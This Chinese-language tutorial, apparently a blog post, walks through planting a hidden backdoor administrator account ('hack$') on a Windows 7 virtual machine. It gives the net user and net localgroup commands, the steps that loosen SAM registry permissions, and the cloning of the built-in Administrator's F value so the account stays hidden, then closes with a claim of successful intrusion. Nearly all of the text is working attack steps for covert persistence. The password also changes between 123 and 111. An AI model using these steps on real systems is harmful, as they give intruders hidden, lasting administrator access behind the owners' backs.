Windows隐藏用户流程
1. 打开win7 虚拟机,再打开CMD命令,输入net user hack$ 123 /add,新建一个隐藏用户hack,$代表是隐藏用户
2. 此时我们这个新创建的hack隐藏用户还只是普通用户,我们需要再提权到管理员组,输入net localgroup administrators hack$ /add
3. 输入net user hack$查看一下现在隐藏用户hack的状态
可以看到hack隐藏用户创建完成
4. 我们打开计算机管理,用户和组,可以看到刚刚创建了的隐藏用户hack
5. 此时我们再运行,输入regedit,打开注册表,进入HEY_LOCAL_MACHINE>SAM>SAM,如果无法查看SAM文件夹目录,可以右击SAM,选择权限,在组或用户名一栏,找到Administrators,把下面权限一栏的完全控制和读取勾选上,最后把注册表关闭,重新打开即可
6. 打开SAM>SAM>Domains>Account>Users>Names即可查看用户信息
7. 点击Administrators 可以看到右边一栏键值为1F4
此时我们再点击上面Users的000001F4,可以看到F(用户信息)和V(用户权限)的内容
8. 右击000001F4,导出admin.reg注册表信息文件
9. 查看我们隐藏用户hack的键值,并按照上面的方法把文件夹导出
10. 最后把我们的hack隐藏用户也一起导出,避免我们要恢复的时候再要重新添加,这里可以随便命名
最后可以看到桌面上多了三个文件
11. 打开CMD,输入net user hack$ /del 把隐藏用户hack删掉
此时我们打开计算机管理,打开本地用户和组里面的用户,可以看到hack$已经被删除了
12. 此时我们再打开regedit,可以看到注册表也没有hack$的信息了
13. 现在我们开始要盗用admin的身份,来绕过用户和组,因为我们刚刚已经把hack添加到管理员用户组里面了,此时我们只需要把F(用户信息)进行替换即可,最后ctrl+s保存
替换效果如图
14. 右击hack.reg,以注册表方式打开
选择是
成功添加了!
15. 现在我们已经成功绕过了,并留了一个隐藏用户了!打开计算机管理,刷新一下,发现成功隐藏信息
再打开注册表,发现这里却是有隐藏用户hack的信息的
16. 打开cmd,输入net user hack$ /active:yes把后门隐藏用户hack状态设置为启用
最后切换用户,hack$,输入密码111
成功打开win7
至此,成功利用后门,入侵win7!
注意:此后门利用方法只能用一次,打开计算机管理,可以看到隐藏用户hack再次出现了
